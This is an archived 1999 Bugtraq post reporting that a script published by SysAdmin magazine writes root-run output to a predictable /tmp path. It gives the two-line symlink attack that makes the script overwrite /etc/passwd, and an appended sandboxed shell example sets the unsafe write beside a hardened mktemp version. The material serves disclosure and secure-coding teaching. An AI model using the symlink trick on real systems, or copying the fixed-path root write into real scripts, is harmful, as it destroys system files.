Bugtraq mailing list archives
January SysAdmin EY script DoS bug.
From: jkb () BEST COM (Jan B. Koum)
Date: Mon, 4 Jan 1999 02:33:46 -0800
/* Warning! Lame bug report ahead. */
/* This is nothing against EY. They are a good company. This
is against people who claim to be security experts and can't
write a secure script. */
Let's make it short. SysAdmin (www.samag.com - btw, their
DNS is broken. Isn't it ironic that they can't get their
own systems running, yet they teach others how) magazine
published a script in the Jan 1999 issue which, after you
run it as root, tells you stuff about your system. Here
are some parts of this script:
    set HOSTNAME=`hostname`
    set basedir=/tmp/eyscan
    set OUTPUT=${basedir}/ey-${HOSTNAME}.out
After that, output like 'ls -l /etc/passwd' is sent to
$OUTFILE.
So you know that your admin runs lame scripts as root
and what do you do? Hmm.. gee..
    % mkdir /tmp/eyscan
    % ln -s /etc/passwd /tmp/eyscan/ey-`hostname`.out
After an admin runs the script - he is toasted. A point
to this story, kids:
o set basedir=/root or /var/run ..
-- Yan
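
The problem described in the post, shown as an added example (not part of the original message and not code from the EY script): the fixed-path write follows a pre-planted symlink, while a private directory from `mktemp -d` plus an exclusive create does not. This goes beyond the post's own suggestion of moving `basedir` to a root-only directory; the function names are hypothetical, `uname -n` stands in for `hostname`, and the "victim" file is a constructed stand-in inside a throwaway sandbox.

```shell
#!/bin/sh
# Added example; function names are hypothetical, not from the EY script.
# `uname -n` stands in for `hostname` so the block needs only POSIX tools
# plus mktemp.

# Pattern from the post: fixed path under a world-writable directory.
# `>` follows a pre-planted symlink and truncates whatever it points to.
unsafe_write() {                 # $1 = base directory, e.g. /tmp/eyscan
    mkdir -p "$1"
    echo "scan output" > "$1/ey-$(uname -n).out"
}

# Hardened pattern: private, unpredictable directory plus exclusive create.
# Prints the path of the report file on success.
safe_write() {                   # $1 = parent directory, e.g. /tmp
    (
        umask 077                                # dir 0700, file 0600
        dir=$(mktemp -d "$1/eyscan.XXXXXX") || exit 1
        out="$dir/ey-$(uname -n).out"
        set -C                                   # noclobber: fail if path exists
        echo "scan output" > "$out" || exit 1
        printf '%s\n' "$out"
    )
}

# Constructed demo in a throwaway sandbox; "victim" stands in for /etc/passwd.
demo() {
    sb=$(mktemp -d) || return 1
    echo "root:x:0:0" > "$sb/victim"
    mkdir "$sb/eyscan"
    ln -s "$sb/victim" "$sb/eyscan/ey-$(uname -n).out"

    unsafe_write "$sb/eyscan"
    echo "after unsafe_write: $(cat "$sb/victim")"   # content replaced

    echo "root:x:0:0" > "$sb/victim"
    report=$(safe_write "$sb")
    echo "after safe_write:   $(cat "$sb/victim")"   # unchanged
    echo "report written to:  $report"
    rm -rf "$sb"
}

demo
```

On Linux, the `fs.protected_symlinks` sysctl also refuses to follow another user's symlink in a sticky world-writable directory, but a root-run script should not depend on that setting being enabled.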
